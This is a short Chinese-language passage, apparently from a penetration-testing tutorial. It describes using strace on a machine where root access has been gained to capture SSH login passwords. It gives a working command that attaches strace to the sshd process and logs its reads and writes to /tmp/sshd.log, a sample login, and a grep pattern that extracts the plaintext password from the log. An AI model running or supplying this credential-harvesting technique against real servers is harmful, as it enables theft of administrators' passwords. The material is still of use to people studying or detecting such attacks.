strace是一個可用於診斷、調試和教學的Linux用戶空間跟蹤器。我們用它來監控用戶空間進程和內核的交互,比如系統調用、信號傳遞、進程狀態變更等。在後面抓取用戶密碼的時候,我們會使用這個軟件來監控用戶的ssh登錄操作。
在獲取到目標ROOT權限後,可以直接在終端執行如下命令,該命令會監聽sshd進程,並將登錄過程及信息記錄到/tmp/sshd.log文件中。
(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/sshd.log &)
接着模擬管理員ssh登錄。輸入正確的密碼abc.123
ssh root@192.168.236.100
最後篩選登錄密碼。如圖所示。
grep -E 'read\(6, ".+\\0\\0\\0\\.+"' /tmp/sshd.log